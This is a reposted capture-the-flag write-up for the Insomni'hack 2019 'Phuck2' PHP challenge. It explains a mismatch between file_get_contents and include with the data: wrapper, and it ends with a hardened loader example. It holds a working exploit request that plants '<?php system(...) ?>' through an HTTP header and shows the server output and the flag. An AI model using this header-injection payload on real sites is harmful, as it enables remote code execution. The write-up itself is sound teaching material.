Phuck2 – Insomni’hack 2019

Posted: 2019-08-25 19:55:11

Original source: https://www.dazhuanlan.com/2019/08/25/5d625a00a9ecb/


<?php
// Challenge source (index.php)
stream_wrapper_unregister('php');
if(isset($_GET['hl'])) highlight_file(__FILE__);

$mkdir = function($dir) {
    system('mkdir -- '.escapeshellarg($dir));
};

// per-request random working directory
$randFolder = bin2hex(random_bytes(16));
$mkdir('users/'.$randFolder);
chdir('users/'.$randFolder);

// directory name taken from X-Forwarded-For (or the client IP), with '.' and '-' stripped
$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');

// content check via file_get_contents(), then include() of the same string
$_GET['page']=str_replace('.','',$_GET['page']);
if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
    include($_GET['page']);
}

chdir(__DIR__);
system('rm -rf users/'.$randFolder);

Code analysis

stream_wrapper_unregister('php');

We unregister the php:// wrapper.

$mkdir = function($dir) {
    system('mkdir -- '.escapeshellarg($dir));
};

Since we cannot get past escapeshellarg, there is no need to spend time on this part.


$randFolder = bin2hex(random_bytes(16));
$mkdir('users/'.$randFolder);
chdir('users/'.$randFolder);

It creates a random folder specific to the user and changes into that directory.

$userFolder = (isset($_SERVER['HTTP_X_FORWARDED_FOR']) ? $_SERVER['HTTP_X_FORWARDED_FOR'] : $_SERVER['REMOTE_ADDR']);
$userFolder = basename(str_replace(['.','-'],['',''],$userFolder));

If the X-Forwarded-For header is set, the header's value is assigned to $userFolder; otherwise the user's (our) IP address is.

Any dots and dashes in the value of $userFolder are removed (replaced with ''), and basename() strips any directory part (e.g. "127.0.0.1" -> "127001").


$mkdir($userFolder);
chdir($userFolder);
file_put_contents('profile',print_r($_SERVER,true));
chdir('..');

It creates a folder named after $userFolder and writes the contents of the $_SERVER array into a file named profile inside that folder.

$_GET['page']=str_replace('.','',$_GET['page']);

if(!stripos(file_get_contents($_GET['page']),'<?') && !stripos(file_get_contents($_GET['page']),'php')) {
    include($_GET['page']);
}

chdir(__DIR__);
system('rm -rf users/'.$randFolder);

It removes the dots from the page value we send via GET, then uses stripos on the content returned by file_get_contents($page) to check whether the file contains the strings <? or php. If neither is found, the file is included.

Afterwards it deletes the folder it created (rm -rf users/$randFolder).


Phpinfo

Directive           Local Value   Master Value
allow_url_fopen     On            On
allow_url_include   Off           Off

We see these values, which means that URLs and some wrappers will not work inside include.

Solution

When we send data:,xx/profile as the page value, because of allow_url_fopen and allow_url_include we get:

# --> denotes the returned value
file_get_contents('data:,xx/profile'); --> string 'xx/profile'
include('data:,xx/profile'); --> the contents of the file named 'data:,xx/profile'

The data wrapper works in file_get_contents but not in include, which instead treats the string as a relative file path.

So:

GET /?page=data:,xx/profile HTTP/1.1
X-Forwarded-For: data:,xx
Get-Flag: <?php system('/get_flag'); ?>
Host: phuck.teaser.insomnihack.ch


HTTP/1.1 200 OK
Date: Sun, 20 Jan 2019 20:16:13 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: User-Agent,Accept-Encoding
Content-Length: 1101
Content-Type: text/html; charset=UTF-8

Array
(
[HTTP_X_FORWARDED_FOR] => data:,xx
[HTTP_GET_FLAG] => INS{PhP_UrL_Phuck3rY_h3h3!}
[HTTP_HOST] => phuck.teaser.insomnihack.ch
[PATH] => /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
[SERVER_SIGNATURE] => <address>Apache/2.4.29 (Ubuntu) Server at phuck.teaser.insomnihack.ch Port 80</address>

[SERVER_SOFTWARE] => Apache/2.4.29 (Ubuntu)
[SERVER_NAME] => phuck.teaser.insomnihack.ch
[SERVER_ADDR] => 172.17.0.2
[SERVER_PORT] => 80
[REMOTE_ADDR] => **CENSORED**
[DOCUMENT_ROOT] => /var/www/html/
[REQUEST_SCHEME] => http
[CONTEXT_PREFIX] =>
[CONTEXT_DOCUMENT_ROOT] => /var/www/html/
[SERVER_ADMIN] => [no address given]
[SCRIPT_FILENAME] => /var/www/html/index.php
[REMOTE_PORT] => 42696
[GATEWAY_INTERFACE] => CGI/1.1
[SERVER_PROTOCOL] => HTTP/1.1
[REQUEST_METHOD] => GET
[QUERY_STRING] => page=data:,xx/profile
[REQUEST_URI] => /?page=data:,xx/profile
[SCRIPT_NAME] => /index.php
[PHP_SELF] => /index.php
[REQUEST_TIME_FLOAT] => 1548015373.641
[REQUEST_TIME] => 1548015373
)

And the flag: INS{PhP_UrL_Phuck3rY_h3h3!}
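For comparison, here is a hardened version of the page loader, written as an added example for this writeup (it is not the challenge's code). The root cause above is that the check and the include operate on different things: file_get_contents() honours the data: wrapper while include() resolves the same string as a relative path, and the X-Forwarded-For "sanitizer" is a denylist that lets a directory named data:,xx exist. The fix allowlists the page name, resolves it with realpath() under one fixed directory, and includes exactly the path that was checked. The pages/ layout and the .php suffix are assumptions.

```php
<?php
// Added example, not the challenge's code. Assumed layout: static pages live
// under $baseDir as <name>.php; nothing else is ever included.

function resolvePage($page, string $baseDir): ?string
{
    // Allowlist instead of denylist: a bare name only. This rejects '/', '.',
    // ':' and ',' so neither a wrapper prefix nor a directory can be named.
    if (!is_string($page) || !preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $page)) {
        return null;
    }

    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $page . '.php');

    // realpath() returns false for a missing file and resolves '..' and
    // symlinks, so a prefix test on the resolved path is a real containment check.
    if ($base === false || $target === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// The vulnerable code checked one value (a data: URI read by file_get_contents)
// and included another (a relative path). Here the checked value and the
// included value are the same resolved filesystem path, so there is no
// wrapper mismatch to exploit and no request-controlled directory in play.
$target = resolvePage($_GET['page'] ?? '', __DIR__ . '/pages');
if ($target === null) {
    http_response_code(404);
    exit('no such page');
}
include $target;
```

The same allowlist idea applies to the X-Forwarded-For value: a directory name derived from a request header should be matched against a strict pattern (or replaced by a hash of the value) rather than cleaned by stripping a few characters.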


NOTE: I did not solve this challenge during the CTF; this writeup was written with the help of information shared on IRC after the CTF (by Blaklis).

Original URL: https://www.cnblogs.com/petewell/p/11408852.html